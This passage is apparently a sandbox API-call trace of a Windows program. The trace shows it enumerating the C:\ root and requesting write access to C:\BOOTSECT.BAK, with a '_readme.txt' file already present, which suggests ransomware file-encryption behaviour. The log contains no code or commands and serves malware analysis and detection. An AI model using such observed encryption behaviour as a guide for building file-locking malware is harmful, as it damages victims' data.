ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0178.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0178.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbfa50 [0178.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0178.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0178.426] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0178.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0178.427] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0178.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0178.427] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x95957a00, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95957a00, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95957a00, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0178.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0178.427] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0178.427] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0178.430] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0178.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0178.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0178.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0178.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0178.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cbfa50 | out: hHeap=0x6a0000) returned 1 [0178.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0178.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0178.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.432] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa384ad20, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa384ad20, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xcf180940, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0178.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.432] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0178.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.432] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xb883f1e0, ftCreationTime.dwHighDateTime=0x1d8a6e8, ftLastAccessTime.dwLowDateTime=0xb883f1e0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xb883f1e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0178.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0178.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0178.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0178.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0178.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0178.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0178.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.434] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa37fea60, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa37fea60, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xcf832720, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0178.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.434] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0178.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.435] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0178.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0178.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0178.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0178.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f40 [0178.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0178.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0178.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0178.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.437] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa10d8470, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0xa10d8470, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0178.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0178.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0178.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.438] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1434c8c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1434c8c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0178.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0178.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0178.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c18 [0178.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0178.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f68 | out: hHeap=0x6a0000) returned 1 [0178.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0178.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f40 | out: hHeap=0x6a0000) returned 1 [0178.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0178.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0178.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0178.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0178.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.441] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1f2b3de0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1f2b3de0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0178.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0178.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f40 [0178.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f40 | out: hHeap=0x6a0000) returned 1 [0178.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0178.442] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7844bbf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x78471d50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x78471d50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0178.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0178.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f40 [0178.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f18 [0178.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f40 | out: hHeap=0x6a0000) returned 1 [0178.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0178.442] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xa3740380, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xbd8bb9c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbd8bb9c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0178.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0178.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0178.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16c) returned 0x2c40050 [0178.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0178.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0178.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f40 [0178.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ef0 [0178.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0178.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0178.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a90 [0178.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c18 | out: hHeap=0x6a0000) returned 1 [0178.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0178.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f68 | out: hHeap=0x6a0000) returned 1 [0178.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f18 | out: hHeap=0x6a0000) returned 1 [0178.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0178.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0178.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0178.446] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1fe61c0, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0xa1fe61c0, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xa1fe61c0, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0178.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f18 [0178.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f68 | out: hHeap=0x6a0000) returned 1 [0178.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f18 | out: hHeap=0x6a0000) returned 1 [0178.447] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0178.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f18 [0178.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f68 | out: hHeap=0x6a0000) returned 1 [0178.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f18 | out: hHeap=0x6a0000) returned 1 [0178.448] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa17fc670, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0xa17fc670, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0178.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f18 [0178.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f68 | out: hHeap=0x6a0000) returned 1 [0178.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f18 | out: hHeap=0x6a0000) returned 1 [0178.448] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xe071b790, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0xe071b790, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe071b790, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0178.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f18 [0178.448] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0178.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f18 | out: hHeap=0x6a0000) returned 1 [0178.449] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xe071b790, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0xe071b790, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe071b790, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0178.449] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.449] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.450] HeapFree (in: hHeap=0x6a0000, 